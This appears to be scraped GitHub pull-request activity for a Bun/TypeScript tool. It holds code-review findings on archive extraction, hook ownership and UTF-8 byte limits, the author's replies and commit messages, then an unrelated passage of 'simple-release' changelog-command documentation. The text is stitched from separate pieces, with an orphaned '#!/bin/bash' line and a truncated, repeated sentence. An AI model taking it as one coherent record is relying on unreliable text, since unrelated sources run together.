BUNDLE_CONTENTS allows any entry under agents/** and skills/**. Bun.Archive.extract() overwrites existing files and is not atomic. A remote entry can replace a user-owned agent or skill, and a failed extraction can leave a partial installation. Extract into staging, validate exact Archgate-owned paths, then install only those entries without replacing user files.

Do not use the command prefix as hook ownership.

startsWith("archgate check") can remove a user hook whose command begins with that text. It also removes such a command for an event other than afterFileEdit. Match the generated event and exact known commands, or add an explicit ownership marker.

152-161: The decompressed-byte cap is still not enforced.

raw.slice(0, HEAD_BYTES - bytes) limits UTF-16 code units, not UTF-8 bytes. CJK and emoji input can make Buffer.byteLength(chunk, "utf8") exceed the remaining budget. The decoded stream chunk is also materialized before this slice. Read Uint8Array chunks, cap them before decoding, preserve TextDecoder state, and count the accepted byte length. Cancel the reader when a limit is reached.

Comment thread tests/helpers/plugin-install-cursor-hooks.test.ts
Comment thread tests/helpers/session-context-codex.test.ts Outdated
The "enormous first turn" test called readCodexSession, which reads the
chosen rollout in full after discovery (session-context-codex.ts:398). Its
assertions were satisfied by that full read, so the test passed whether or
not the head read stopped early — it proved classification, not the bound.
The ASCII fixture never exercised the byte accounting either.

readCompressedHead and HEAD_BYTES are now exported as a test seam, in the
shape platform.ts already uses for _resetAllCaches. The test calls the head
reader directly with multibyte content — 40k characters, 120k bytes, over
the budget — and asserts the result is within HEAD_BYTES while still
carrying the parsed session_meta cwd that discovery classifies on. That
fixture is what separates a byte budget from a string-length one: reverting
to `chunk.length` fails it.

Also asserts the whole preserved hook entry rather than its command alone,
so dropping `event` or `type` — which would leave the hook registered but
inert — fails the test. Both assertions fire-tested in that direction.

Fourth pass worked — both findings applied in 2527072.

The bounded-read test was the right catch, and you were right about why. readCodexSession reads the chosen rollout in full at session-context-codex.ts:398 after discovery, so my assertions (ok === true, sessionFile ends with .zst) were satisfied by that read regardless of whether the head read stopped early. The test proved classification and nothing about the bound. The ASCII fixture never touched the byte accounting either.

readCompressedHead and HEAD_BYTES are now exported as a test seam — the shape platform.ts already uses for _resetAllCaches — and the test calls the head reader directly:

const wide = "決".repeat(40_000); // 40k chars, 120k bytes — over the budget
const head = await readCompressedHead(Bun.file(file));

expect(Buffer.byteLength(head, "utf8")).toBeLessThanOrEqual(HEAD_BYTES);
expect(metaLine.type).toBe("session_meta");
expect(metaLine.payload.cwd).toBe(PROJECT);

That fixture is what separates a byte budget from a string-length one: 40k characters sits under a 64k character cap but over a 64k byte one. Reverting Buffer.byteLength(chunk, "utf8") to chunk.length fails it — I checked. The cwd is asserted parsed rather than as a substring, since it is JSON-escaped inside the line.

Whole hook entry — applied. The assertion compared only command, so dropping event or type would have left the hook registered but inert and still passed. Fire-tested by making the merge strip type: both hook tests fail.

bun run validate green: 2604 pass, 41/41 rules. Verified under WSL as well (66/66 on the touched files).

Apply the byte limit before UTF-8 decoding.

raw is already a decoded string. raw.slice(0, HEAD_BYTES - bytes) uses UTF-16 code-unit positions, not UTF-8 bytes. For the test fixture’s "決", each selected character adds 3 bytes, so the returned text can exceed HEAD_BYTES; a surrogate pair can also be split. The full decoded chunk is allocated before the slice.

Read inflated as Uint8Array chunks, cap subarray() by the remaining byte budget, and decode with a stateful TextDecoder. Bun exposes DecompressionStream.readable as a byte stream for this approach. (bun.com)

This can fail the HEAD_BYTES assertion in tests/helpers/session-context-codex.test.ts (Line 239). Verify with bun run validate under Bun 1.4.0.

…e fixture

The bounded-head-read test asserted through a cast to a locally declared
`{ type; payload: { cwd } }`, which restates a contract the reader already
owns and needed an oxlint suppression carrying no reason — GEN-004 allows a
suppression only for a genuine false positive, with one stated.

`Bun.JSONL.parse(head)[0]` with `toMatchObject` asserts the same two facts
directly, with no second type and no suppression. The fixture writes through
`Bun.write` rather than `writeFileSync` (ARCH-006).

Fifth pass — both applied in ebcd58f.

Hand-written metadata type. Fair, and the sharper problem is the suppression it required: GEN-004 permits oxlint-disable only for a genuine false positive with a stated reason, and mine carried none. Replaced with a matcher, which is also what ARCH-025 asks for:

expect(Bun.JSONL.parse(head)[0]).toMatchObject({
  type: "session_meta",
  payload: { cwd: PROJECT },
});

No second contract, no suppression, same two facts asserted. Re-fire-tested afterwards — reverting Buffer.byteLength(chunk, "utf8") to chunk.length still fails the test, so the rewrite did not weaken it.

Bun.write for the fixture — applied (ARCH-006). writeFileSync remains in the file's other rollout helpers, which this change does not touch.

bun run validate green: 2604 pass, 41/41 rules.

151-160: 🚀 Performance & Scalability | 🟠 Major | ⚡ Quick win

Enforce both limits before appending decoded text.

Line 156 uses a byte count as a string slice length. If one byte remains and raw starts with "決", this appends three UTF-8 bytes. The result can exceed HEAD_BYTES.

The loop also counts all newlines in a decoded chunk before Line 160 runs. A chunk with more than 50 lines returns lines after the required scan limit.

Read Uint8Array chunks with a streaming TextDecoder. Cap each byte chunk to the remaining budget. Append only through the 50th newline. Cancel the reader when either limit is reached. The existing multibyte test can pass or fail based on decompressor chunk boundaries, so add a controlled boundary regression.

#!/bin/bash

`sessionReadFailure` exists, by its own docstring, for "a session file
that is discovered but then unreadable, which a session removed between
discovery and the read produces". It could not be reached for that case:
`readTextIfExists` checks existence and then reads, and returns null only
for absence — a file that exists but cannot be read rejects, and the
rejection escaped `readClaudeCodeSession`, `readCursorSession` and
`readCopilotSession` instead of becoming a result.

The antigravity and pi readers already spell this `.catch(() => null)`;
these three did not. A permission-denied transcript, or one deleted
between discovery and the read, therefore crashed the command rather than
reporting which session failed.

Fire-tested per site, both directions, under WSL — chmod is a no-op on
Windows and root ignores the mode bits, so these cases are non-root POSIX
only and report as passing without ever running anywhere else.

Also switches the three transcript parses to `safeParse`, the convention
CLAUDE.md states. Behaviour is unchanged: the surrounding try/catch
already caught the throw, and still guards `Bun.JSONL.parse`.

Found by CodeRabbit on #576 and deferred out of it: the review ran against

`sessionReadFailure` exists, by its own docstring, for *"a session file

It could not be reached for that case. `readTextIfExists` checks
existence and then reads, returning `null` **only** for absence — its
own comment says so: *"Only absence is absorbed — a file that exists but
cannot be read still throws."* So the exact scenario the helper is named
for produced a rejection, which escaped `readClaudeCodeSession`,
`readCursorSession` and `readCopilotSession` rather than becoming a
result.

In practice: a transcript that is permission-denied, or deleted between
discovery and the read, crashed the command instead of reporting which
session failed.

What makes this more than a hypothetical is that two sibling readers
already guard it — `session-context-antigravity.ts` and
`session-context-pi.ts` both write `readTextIfExists(...).catch(() =>
null)`. Three readers in the same module family did not. This makes them
consistent.

## Fire-tested per site, both directions

| reader | without fix | with fix |
|---|---|---|
| `readClaudeCodeSession` | fail | pass |
| `readCursorSession` | fail | pass |
| `readCopilotSession` | fail | pass |

An unreadable-but-present file can only be built as a non-root POSIX
user — `chmod` is a no-op on Windows and root bypasses the mode bits —
so these cases carry `skipIf` and were verified under WSL. On a Windows
dev machine they report as passing without ever executing, which is
precisely how this class of gap survives.

## Also

Switches the three transcript parses to `safeParse`, the convention
CLAUDE.md states. Behaviour is unchanged — the surrounding `try/catch`
already caught the throw, and still guards `Bun.JSONL.parse`.

## Verification

`bun run validate` green: 2576 pass, 0 fail, 21/21 ADR rules, build
check clean. Independent of #576 and based on `main`; the two can land
in either order.

### Custom Changelog Preamble

You can add custom markdown to the top of the changelog (right after the
version header) using the `!simple-release/set-preamble` command. The
markdown after the command line becomes the preamble.

```md
!simple-release/set-preamble
## What's new?
- The website was completely redesigned
- The new API gives you awesome possibilities
```

In a monorepo, pass the full package name after the command to target a
single package's changelog. Wrap the name in backticks so GitHub keeps
it as text instead of a mention:

```md
!simple-release/set-preamble `@your-org/core`
## Core changes
- New plugin system
```

Use one comment per package, plus one without a name for the whole
release.

### Access Restrictions

The commands can only be used by users with permissions:
- repository owner
- organization member
- collaborator

### Notes

- The last comment with `!simple-release/set-options` command takes
priority
- The last `!simple-release/set-preamble` comment per package takes
priority
- JSON must be valid, otherwise the `set-options` command will be
ignored
- Parameters apply only to the current release execution
- The commands can be updated by editing the comment or adding a new one
